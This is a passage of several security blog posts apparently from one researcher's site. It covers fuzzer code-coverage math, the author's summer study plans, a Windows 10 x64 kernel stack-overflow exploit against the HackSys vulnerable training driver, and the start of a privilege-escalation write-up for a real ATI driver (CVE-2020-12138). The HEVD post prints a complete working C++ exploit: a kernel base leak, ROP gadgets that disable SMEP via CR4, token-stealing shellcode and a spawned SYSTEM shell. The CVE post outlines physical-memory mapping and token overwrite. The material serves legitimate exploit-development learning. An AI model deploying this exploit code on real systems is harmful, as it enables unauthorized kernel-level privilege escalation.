<snip>

155090/397422769 == .0003902393423261565. I would think the math is something close to (159/7958) * (158/7958), which would end up being .0003966855142551934. So you can see that they’re pretty close, given some random variance, they’re not too far off. This should be close enough to demonstrate the problem.

Now that we have to pass two checks, we can mathematically summarize the odds of this happening with our dumb fuzzer as follows:

((159/7958) * (1/255)) == odds to pass first check
odds to pass first check * (158/7958) == odds to pass first check and have second index targeted for mutation
odds to pass first check * ((158/7958) * (1/255)) == odds to have second index targeted for mutation and hold the correct value
((159/7958) * (1/255)) * ((158/7958) * (1/255)) == odds to pass both checks
((0.0199798944458407 * 0.003921568627451‬) * (0.0198542347323448 * 0.003921568627451)) == 6.100507716342904e-9

So the odds of us getting both indexes selected for mutation and having both indexes mutated to hold the needed value is around .000000006100507716342904, which is .0000006100507716342904%.

For one check enabled, we should’ve expected ONE crash every ~12,820 iterations.

For two checks enabled, we should expect ONE crash every ~163 million iterations.

This is quite the problem. Our fuzzer would need to run for a very long time to reach that many iterations on average. As written and performing in a VM, the fuzzer does roughly 1,600 iterations a second. It would take me about 28 hours to reach 163 million iterations. You can see how our chances of finding the bug decreased exponentionally with just one more check enabled. Imagine a third check being added!

How Code Coverage Tracking Can Help Us

If our fuzzer was able to track code coverage, we could turn this problem into something much more manageable.

Generically, a code coverage tracking system in our fuzzer would keep track of what inputs reached new code in the application. There are many ways to do this. Sometimes when source code is available to you, you can recompile the binaries with instrumentation added that informs the fuzzer when new code is reached, there is emulation, etc. @gamozolabs has a really cool Windows userland code coverage system that leverages an extremely fast debugger that sets millions of breakpoints in a target binary and slowly removes breakpoints as they are reached called ‘mesos’. Once your fuzzer becomes aware that a mutated input reached new code, it would save that input off so that it can be re-used and mutated further to reach even more code. That is a very simple explanation, but hopefully it paints a clear picture.

I haven’t yet implemented a code coverage technique for the fuzzer, but we can easily simulate one. Let’s say our fuzzer was able, 1 out of ~13,000 times, to pass the first check and reach that second check in the program.

The first time the input reached this second check, it would be considered new code coverage. As a result, our now smart fuzzer would save that input off as it caused new code to be reached. This input would then be fed back through the mutator and hopefully reach the same new code again with the added possibility of reaching even more code.

Let’s demonstrate this. Let’s doctor our file Canon_40D.jpg such that the byte at the 2626 index is \x6c, and feed it through to our vulnerable application.

h0mbre@pwn:~/fuzzing$ vuln Canon_altered.jpg 
[>] Analyzing file: Canon_altered.jpg.
[>] Canon_altered.jpg is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 2 failed.

As you can see, we passed the first check and failed on the second check. Let’s use this Canon_altered.jpg file now as our base input that we use for mutation simulating the fact that we have code coverage tracking in our fuzzer and see how many crashes we get when there are only testing for two checks total.

h0mbre@pwn:~/fuzzing$ ./fuzzer Canon_altered.jpg 1000000
[>] Size of file: 7958 bytes.
[>] Flipping up to 159 bytes.
[>] Fuzzing for 1000000 iterations...
[>] Crashes: 86
[>] Fuzzing completed, exiting...

So by using the file that got us increased code coverage, ie it passed the first check, as a base file and sending it back through the mutator, we were able to pass the second check 86 times. We essentially took that exponentially hard problem we had earlier and turned it back into our original problem of only needing to pass one check. There are a bunch of other considerations that real fuzzers would have to take into account but I’m just trying to plainly demonstrate how it helps reduce the exponential problem into a more manageable one.

We reduced our ((0.0199798944458407 * 0.003921568627451‬) * (0.0198542347323448 * 0.003921568627451)) == 6.100507716342904e-9 problem to something closer to (0.0199798944458407 * 0.003921568627451)‬, which is a huge win for us.

Some nuance here is that feeding the altered file back through the mutation process could do a few things. It could remutate the byte at index 2626 and then we wouldn’t even pass the first check. It could mutate the file so much (remember, it is already up to 2% different than a valid jpeg from the first round of mutation) that the vulnerable application flat out rejects the input and we waste fuzz cycles.

So there are a lot of other things to consider, but hopefully this plainly demonstrates how code-coverage helps fuzzers complete a more comprehensive test of a target binary.

Conclusion

There are a lot of resources out there on different code coverage techniques, definitely follow up and read more on the subject if it interests you. @carste1n has a great series where he goes through incrementally improves a fuzzer, you can catch the latest article here: https://carstein.github.io/2020/05/21/writing-simple-fuzzer-4.html

At some time in the future we can add some code coverage logic to our dumb fuzzer from this article and we can use the vulnerable program as a sort of benchmark to judge the effectiveness of a code coverage technique.

Some interesting notes, I fuzzed the vulnerable application with all three checks enabled with AFL for about 13 hours and wasn’t able to crash it! I’m not sure why it was so difficult. With only two checks enabled, AFL was able to find the crash very quickly. Maybe there was something wrong with my testing, I’m not quite sure.

Until next time!

The Summer of PWN

The Human Machine Interface

h0mbre

5 May 2020 at 04:00

Summer Plans

Now that I finished the HEVD series of posts, it’s time for me to switch gears. The series became more of a chore as I progressed and the excercise felt quite silly for a few reasons. Primarily, there are still so many fundamental binary exploitation concepts that I still don’t know. Why was I spending so much time on very esoteric material when I haven’t even accomplished the basics? The material was tied closely to my wanting to take AWE with Offsec, but since that is not happening, I get to focus now on going back to the basics.

For the forseeable future, I’m going to be working primarily on leveling up my pwn skills by doing CTF challenges, reversing, analyzing malware, and developing.

Some of the tools I’m going to be using this summer (I’ll update this as I go along):

I will be keeping a daily log of everything I do and will publish it so those trying accomplish similar goals can see what I tried. I’ll also make a post at the end detailing what went right and what went wrong.

I’m taking a purposeful break from blogging so that I can focus on leveling up. Blogging takes a lot of my time and it’s interfering with my ability to put hours into getting better. I will hopefully be able to do a write-up detailing how I exploited a bug I found in another Windows kernel mode driver.

Keeping track of the Linux pwn challenge exploits here.

Until then, see you on the other side!

HEVD Exploits – Windows 10 x64 Stack Overflow SMEP Bypass

The Human Machine Interface

h0mbre

4 May 2020 at 04:00

Introduction

This is going to be my last HEVD blog post. This was all of the exploits I wanted to hit when I started this goal in late January. We did quite a few, there are some definitely interesting ones left on the table and there is all of the Linux exploits as well. I’ll speak more about future posts in a future post (haha). I used Hacksys Extreme Vulnerable Driver 2.0 and Windows 10 Build 14393.rs1_release.160715-1616 for this exploit. Some of the newer Windows 10 builds were bugchecking this technique.

All of the exploit code can be found here.

Thanks

To @Cneelis for having such great shellcode in his similar exploit on a different Windows 10 build here: https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
To @abatchy17 for his awesome blog post on his SMEP bypass here: https://www.abatchy.com/2018/01/kernel-exploitation-4
To @ihack4falafel for helping me figure out where to return to after running my shellcode.

And as this is the last HEVD blog post, thanks to everyone who got me this far. As I’ve said every post so far, nothing I was doing is my own idea or technique, was simply recreating their exploits (or at least trying to) in order to learn more about the bug classes and learn more about the Windows kernel. (More thoughts on this later in a future blog post).

SMEP

We’ve already completed a Stack Overflow exploit for HEVD on Windows 7 x64 here; however, the problem is that starting with Windows 8, Microsoft implemented a new mitigation by default called Supervisor Mode Execution Prevention (SMEP). SMEP detects kernel mode code running in userspace stops us from being able to hijack execution in the kernel and send it to our shellcode pointer residing in userspace.

Bypassing SMEP

Taking my cues from Abatchy, I decided to try and bypass SMEP by using a well-known ROP chain technique that utilizes segments of code in the kernel to disable SMEP and then heads to user space to call our shellcode.

In the linked material above, you see that the CR4 register is responsible for enforcing this protection and if we look at Wikipedia, we can get a complete breakdown of CR4 and what its responsibilities are:

20 SMEP Supervisor Mode Execution Protection Enable If set, execution of code in a higher ring generates a fault.

So the 20th bit of the CR4 indicates whether or not SMEP is enforced. Since this vulnerability we’re attacking gives us the ability to overwrite the stack, we’re going to utilize a ROP chain consisting only of kernel space gadgets to disable SMEP by placing a new value in CR4 and then hit our shellcode in userspace.

Getting Kernel Base Address

The first thing we want to do, is to get the base address of the kernel. If we don’t get the base address, we can’t figure out what the offsets are to our gadgets that we want to use to bypass ASLR. In WinDBG, you can simply run lm sm to list all loaded kernel modules alphabetically:

---SNIP---
fffff800`10c7b000 fffff800`1149b000   nt
---SNIP---

We need a way also to get this address in our exploit code. For this part, I leaned heavily on code I was able to find by doing google searches with some syntax like: site:github.com NtQuerySystemInformation and seeing what I could find. Luckily, I was able to find a lot of code that met my needs perfectly. Unfortunately, on Windows 10 in order to use this API your process requires some level of elevation. But, I had already used the API previously and was quite fond of it for giving me so much trouble the first time I used it to get the kernel base address and wanted to use it again but this time in C++ instead of Python.

Using a lot of the tricks that I learned from @tekwizz123’s HEVD exploits, I was able to get the API exported to my exploit code and was able to use it effectively. I won’t go too much into the code here, but this is the function and the typedefs it references to retrieve the base address to the kernel for us:

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG				 Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

This code imports NtQuerySystemInformation from nt.dll and allows us to use it with the System Module Information parameter which returns to us a nice struct of a ModulesCount (how many kernel modules are loaded) and an array of the Modules themselves which have a lot of struct members included a Name. In all my research I couldn’t find an example where the kernel image wasn’t index value 0 so that’s what I’ve implemented here.

You could use a lot of the cool string functions in C++ to easily get the base address of any kernel mode driver as long as you have the name of the .sys file. You could cast the Modules.Name member to a string and do a substring match routine to locate your desired driver as you iterate through the array and return the base address. So now that we have the base address figured out, we can move on to hunting the gadgets.

Hunting Gadgets

The value of these gadgets is that they reside in kernel space so SMEP can’t interfere here. We can place them directly on the stack and overwrite rip so that we are always executing the first gadget and then returning to the stack where our ROP chain resides without ever going into user space. (If you have a preferred method for gadget hunting in the kernel let me know, I tried to script some things up in WinDBG but didn’t get very far before I gave up after it was clear it was super inefficient.) Original work on the gadget locations as far as I know is located here: http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html

Again, just following along with Abatchy’s blog, we can find Gadget 1 (actually the 2nd in our code) by locating a gadget that allows us to place a value into cr4 easily and then takes a ret soon after. Luckily for us, this gadget exists inside of nt!HvlEndSystemInterrupt.

We can find it in WinDBG with the following:

kd> uf HvlEndSystemInterrupt
nt!HvlEndSystemInterrupt:
fffff800`10dc1560 4851            push    rcx
fffff800`10dc1562 50              push    rax
fffff800`10dc1563 52              push    rdx
fffff800`10dc1564 65488b142588610000 mov   rdx,qword ptr gs:[6188h]
fffff800`10dc156d b970000040      mov     ecx,40000070h
fffff800`10dc1572 0fba3200        btr     dword ptr [rdx],0
fffff800`10dc1576 7206            jb      nt!HvlEndSystemInterrupt+0x1e (fffff800`10dc157e)

nt!HvlEndSystemInterrupt+0x18:
fffff800`10dc1578 33c0            xor     eax,eax
fffff800`10dc157a 8bd0            mov     edx,eax
fffff800`10dc157c 0f30            wrmsr

nt!HvlEndSystemInterrupt+0x1e:
fffff800`10dc157e 5a              pop     rdx
fffff800`10dc157f 58              pop     rax
fffff800`10dc1580 59              pop     rcx // Gadget at offset from nt: +0x146580
fffff800`10dc1581 c3              ret

As Abatchy did, I’ve added a comment so you can see the gadget we’re after. We want this:

pop rcx

ret routine because if we can place an arbitrary value into rcx, there is a second gadget which allows us to mov cr4, rcx and then we’ll have everything we need.

Gadget 2 is nested within the KiEnableXSave kernel routine as follows (with some snipping) in WinDBG:

kd> uf nt!KiEnableXSave
nt!KiEnableXSave:

---SNIP---

nt! ?? ::OKHAJAOM::`string'+0x32fc:
fffff800`1105142c 480fbaf112      btr     rcx,12h
fffff800`11051431 0f22e1          mov     cr4,rcx // Gadget at offset from nt: +0x3D6431
fffff800`11051434 c3              ret

So with these two gadgets locations known to us, as in, we know their offsets relative to the kernel base, we can now implement them in our code. So to be clear, our payload that we’ll be sending will look like this when we overwrite the stack:

‘A’ characters * 2056
our pop rcx gadget
The value we want rcx to hold
our mov cr4, rcx gadget
pointer to our shellcode.

So for those following along at home, we will overwrite rip with our first gadget, it will pop the first 8 byte value on the stack into rcx. What value is that? Well, it’s the value that we want cr4 to hold eventually and we can simply place it onto the stack with our stack overflow. So we will pop that value into rcx and then the gadget will hit a ret opcode which will send the rip to our second gadget which will mov cr4, rcx so that cr4 now holds the SMEP-disabled value we want. The gadget will then hit a ret opcode and return rip to where? To a pointer to our userland shellcode that it will now run seemlessly because SMEP is disabled.

You can see this implemented in code here:

 BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

CR4 Value

Again, just following along with Abatchy, I’ll go ahead and place the value 0x70678 into cr4. In binary, 1110000011001111000 which would mean that the 20th bit, the SMEP bit, is set to 0. You can read more about what values to input here on j00ru’s blog post about SMEP.

So if cr4 holds this value, SMEP should be disabled.

Restoring Execution

The hardest part of this exploit for me was restoring execution after the shellcode ran. Unfortunately, our exploit overwrites several register values and corrupts our stack quite a bit. When my shellcode is done running (not really my shellcode, its borrowed from @Cneelis), this is what my callstack looked like along with my stack memory values:

Restoring execution will always be pretty specific to what version of HEVD you’re using and also perhaps what build of Windows you’re on as the some of the kernel routines will change, so I won’t go too much in depth here. But, what I did to figure out why I kept crashing so much after returning to the address in the screenshot of HEVD!IrpDeviceIoCtlHandler+0x19f which is located in the right hand side of the screenshot at ffff9e8196b99158, is that rsi is typically zero’d out if you send regular sized buffers to the driver routine.

So if you were to send a non-overflowing buffer, and put a breakpoint at nt!IopSynchronousServiceTail+0x1a0 (which is where rip would return if we took a ret out our address of ffff9e8196b99158), you would see that rsi is typically 0 when normally system service routines are exiting so when I returned, I had to have an rsi value of 0 in order to stop from getting an exception.

I tried just following the code through until I reached an exception with a non-zero rsi but wasn’t able to pinpoint exactly where the fault occurs or why. The debug information I got from all my bugchecks didn’t bring me any closer to the answer (probably user error). I noticed that if you don’t null out rsi before returning, rsi wouldn’t be referenced in any way until a value was popped into it from the stack which happened to be our IOCTL code, so this confused me even more.

Anyways, my hacky way of tracing through normally sized buffers and taking notes of the register values at the same point we return to out of our shellcode did work, but I’m still unsure why 😒.

Conclusion

All in all, the ROP chain to disable SMEP via cr4 wasn’t too complicated, this could even serve as introduction to ROP chains for some in my opinion because as far as ROP chains go this is fairly straightforward; however, restoring execution after our shellcode was a nightmare for me. A lot of time wasted by misinterpreting the callstack readouts from WinDBG (a lesson learned). As @ihack4falafel says, make sure you keep an eye on @rsp in your memory view in WinDBG anytime you are messing with the stack.

Exploit code here.

Thanks again to all the bloggers who got me through the HEVD exploits:

FuzzySec
r0oki7
Tekwizz123
Abatchy
everyone else I’ve referenced in previous posts!

Huge thanks to HackSysTeam for developing the driver for us to all practice on, can’t wait to tackle it on Linux!

#include <iostream>
#include <string>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL                   0x222003

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG                Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver" << endl;
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: 0x" << hex
        << (INT64)hFile << endl;

    return hFile;
}

void send_payload(HANDLE hFile, INT64 kernel_base) {

    cout << "[>] Allocating RWX shellcode..." << endl;

    // slightly altered shellcode from 
    // https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
    // thank you @Cneelis
    BYTE shellcode[] =
        "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, [gs:188h]       ; Get _ETHREAD pointer from KPCR
        "\x4C\x8B\x82\xB8\x00\x00\x00"              // mov r8, [rdx + b8h]      ; _EPROCESS (kd> u PsGetCurrentProcess)
        "\x4D\x8B\x88\xf0\x02\x00\x00"              // mov r9, [r8 + 2f0h]      ; ActiveProcessLinks list head
        "\x49\x8B\x09"                              // mov rcx, [r9]            ; Follow link to first process in list
        //find_system_proc:
        "\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; Offset from ActiveProcessLinks to UniqueProcessId
        "\x48\x83\xFA\x04"                          // cmp rdx, 4               ; Process with ID 4 is System process
        "\x74\x05"                                  // jz found_system          ; Found SYSTEM token
        "\x48\x8B\x09"                              // mov rcx, [rcx]           ; Follow _LIST_ENTRY Flink pointer
        "\xEB\xF1"                                  // jmp find_system_proc     ; Loop
        //found_system:
        "\x48\x8B\x41\x68"                          // mov rax, [rcx + 68h]     ; Offset from ActiveProcessLinks to Token
        "\x24\xF0"                                  // and al, 0f0h             ; Clear low 4 bits of _EX_FAST_REF structure
        "\x49\x89\x80\x58\x03\x00\x00"              // mov [r8 + 358h], rax     ; Copy SYSTEM token to current process's token
        "\x48\x83\xC4\x40"                          // add rsp, 040h
        "\x48\x31\xF6"                              // xor rsi, rsi             ; Zeroing out rsi register to avoid Crash
        "\x48\x31\xC0"                              // xor rax, rax             ; NTSTATUS Status = STATUS_SUCCESS
        "\xc3";

    LPVOID shellcode_addr = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_addr, shellcode, sizeof(shellcode));

    cout << "[>] Shellcode allocated in userland at: 0x" << (INT64)shellcode_addr
        << endl;

    BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

    // keep this here for testing so you can see what normal buffers do to subsequent routines
    // to learn from for execution restoration
    /*
    BYTE input_buff[2048] = { 0 };
    memset(input_buff, '\x41', 2048);
    */

    cout << "[>] Input buff located at: 0x" << (INT64)&input_buff << endl;

    DWORD bytes_ret = 0x0;

    cout << "[>] Sending payload..." << endl;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        sizeof(input_buff),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] DeviceIoControl failed!" << endl;
    }
}

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

void spawn_shell() {

    cout << "[>] Spawning nt authority/system shell..." << endl;

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof(si));

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL,
        NULL,
        NULL,
        0,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi);
}

int main() {

    HANDLE hFile = grab_handle();

    INT64 kernel_base = get_kernel_base();
    send_payload(hFile, kernel_base);
    spawn_shell();
}

CVE-2020-12138 Exploit Proof-of-Concept, Privilege Escalation in ATI Technologies Inc. Driver atillk64.sys

The Human Machine Interface

h0mbre

25 April 2020 at 04:00

Background

I’ve been focusing, really since the end of January, on working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn some more about Windows kernel exploitation and have really enjoyed my time a lot.

During this time, @ihack4falafel released some proof-of-concept exploits[1][2] against several Windows kernel-mode drivers. The takeaway from these write-ups, for me, was that 3rd party drivers that are responsible for overclocking, RGB light-management, hardware diagnostics are largely broken.

The types of vulnerabilities that were disclosed in these write-ups often were related to low-privileged users having the ability to interact with a kernel-mode driver that was able to directly manipulate physical memory, where all kinds of privileged information resides.

The last FuzzySecurity Windows Exploit Development Tutorial Series is b33f’s exploit against a Razer driver exploiting this very same type of vulnerability.

Getting more interested in this type of bug, I sought out more write-ups and found some great proof-of-concepts:

Jackson T’s write-up of an LG driver privilege escalation vulnerability,
hatRiot’s write-up of a Dell driver privilege escalation vulnerability, and
ReWolf’s write-up of a few different driver vulnerabilities within the same type of logic bug realm.

After reading through those, I decided to just start downloading similar software and searching for drivers that I hadn’t seen CVEs for and that had some key APIs. My criteria when searching was that the driver had to:

allow low-privileged users to interact with it,
have either an MmMapIoSpace or ZwMapViewOfSection import.

As someone who is very new to this type of thing, I figured with the help of the aforementioned walkthroughs, if I was able to find a driver that would allow me to interact with physical memory I could successfully develop an exploit.

Disclaimer

This is kind of a niche space and as a new person getting into this very specific type of target I wasn’t really aware of the best places to look for more information about these types of vulnerable drivers. The first few things I checked was that there were no CVEs for the driver and that the driver hadn’t been mentioned on Twitter by security researchers. By the time I had reversed the driver and discovered it to be vulnerable in theory, but without a working exploit, I realized that the driver had been classified as vulnerable by researchers Jesse Michael and Mickey Shkatov at Eclypsium. The driver gets a small mention in their github repo but without specifically identifying the vulnerabilities that exist.

I’m not claiming responsibility for finding the vulnerability, since I was far from the first. Jesse and Mickey were given all of the credit on the CVE application and I can prove this upon request.

I was able to get in contact with Jesse via Twitter and he was extremely charitable with his time. He gave me a great explanation of their interactions with a vendor about the driver.

At this point, since there was no published proof-of-concept, I decided to press on and develop the exploit, which Jesse wholeheartedly supported and encouraged. I figured I’d develop an exploit, show AMD the proof-of-concept, and give them 90 days to respond/patch or explain that they’re not concerned.

Huge thanks to Jesse for being so charitable. He’s also incredibly knowledgeable and was willing to teach me tons of things along the way when answering my questions.

GIGABYTE Fusion 2.0

One of the first software packages I downloaded was GIGABYTE’s Fusion 2.0 software which comes with several drivers. I won’t get any more in-depth with the types of drivers included other than the subject of this post, atillk64.sys. Using default installation options, the driver was installed here: C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys.

The driver file description states the product name is ATI Diagnostics version 5.11.9.0 and its copyright is ATI Technologies Inc. 2003. I’m not sure what other software packages out there also install this driver, but I’m sure Fusion 2.0 isn’t the only one. I’ve found that several of these hardware diagnostic/configuration software suites install licensed drivers that are often slightly modified (or not modified at all!) versions of known-to-be vulnerable code-bases like the classic WinIO.sys.

atillk64.sys Analysis

The first thing I needed to know was what types of permissions the driver had and if lower-privileged users could interact with the driver. Looking at the device with OSR’s devicetree, we can see that this is the case.

Reversing the driver was pretty easy even as a complete novice just because it is so small. There is the hardly any surface area to explore and the IOCTL handler routine was pretty straightforward. MmMapIoSpace was one of the imports so I was already interested at this point.

One routine caught my attention early on because the API call chain was very similar to one of the driver routines that @ihack4falafel wrote up a proof-of-concept for.

The routine first calls MmMapIoSpace, which takes a physical address as a parameter and a length (and cache type) and maps that memory into system memory and returns a pointer to the now virtual address that corresponds to the beginning of the physical memory you asked to be mapped. So at this point, this system address is not available to us as a userland process. It is stored in rax and the result is checked to make sure the API call succeeded and did not return NULL. After some experimentation, as long as we pass a check that our input buffer is 0x18 in length, we are able to completely control two of the MmMapIoSpace parameters: NumberOfBytes and PhysicalAddress. These values are taken from rdi offsets which is the address of our input buffer. CacheType is hardcoded as 0.

If the call succeeded, a call is made to IoAllocateMdl with the same values. The virtual address returned by MmMapIoSpace is given as a parameter as well as the same Length value. This API also associates our newly created MDL with an IRP.

If the call succeeded, a subsequent call is made to MmBuildMdlForNonPagedPool which takes the MDL we just created and ‘updates it to describe the underlying physical pages.’ MSDN states that IoAllocateMdl doesn’t initialize the data array that follows the MDL structure, and that drivers should call MmBuildMdlForNonPagedPool to initialize the array and describe the physical memory in which the buffer resides.

Next, is a call to MmMapLockedPages, which is an old an deprecated API. This call takes the updated MDL and maps the physical pages that are described by it into our process space. It returns the starting address of this mapping to us eventually you’ll see as the return value (rax) is eventually placed in rbx and moved to [rdi] which will be our output buffer in DeviceIoControl.

Subsequent API calls to IoFreeMdl and MmUnmapIoSpace perform some cleanup and free up the pool allocations (as far as I know, please correct me if I’m wrong).

Exploitation Strategy

The first 8 bytes of our output buffer at this point hold a pointer to the mapped memory in our process space.

Say we mapped 0x1000 bytes from physical address offset 0x100000000 all of the data from 0x100000000 to 0x100001000 would be available to us within our process space. This is bad because we are a low-privileged process and this data can contain arbitrary system/privileged data.

The strategy for exploiting this was heavily informed by FuzzySec’s approach to exploiting his aforementioned Razer driver. At a high-level we are going to:

map physical memory into our process space,
parse through the data looking for “Proc” pool tags,
identify our calling process (typically cmd.exe) and note the location of our security token,
identify a process typically running as SYSTEM (something like lsass.exe) and note the value of its security token,
and finally, overwrite our token with the SYSTEM process token value to gain nt authority/system.

“Proc” Tags in the Pool

Following along with FuzzySec’s strategy here, the first thing we need to do is identify what these data structures actually look like in the pool. There will be pool chunk header and then a tag prepended to each pool allocation. The tag we’ll be looking for in our mapped memory is “Proc”, which is 0x636f7250 as an integer value.

To find some examples, we can use the kd !poolfind "Proc" command to identify pool allocations with our tag.

Looking at the output, we see we started scanning large pool allocations for the tag. I quit the process after 5 minutes or so as this should be enough sample data.

Scanning large pool allocation table for tag 0x636f7250 (Proc) (ffffd48c9d250000 : ffffd48c9d550000)

ffffd48ca040f340 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca10bd380 : tag Proc, size     0xb70, Nonpaged pool
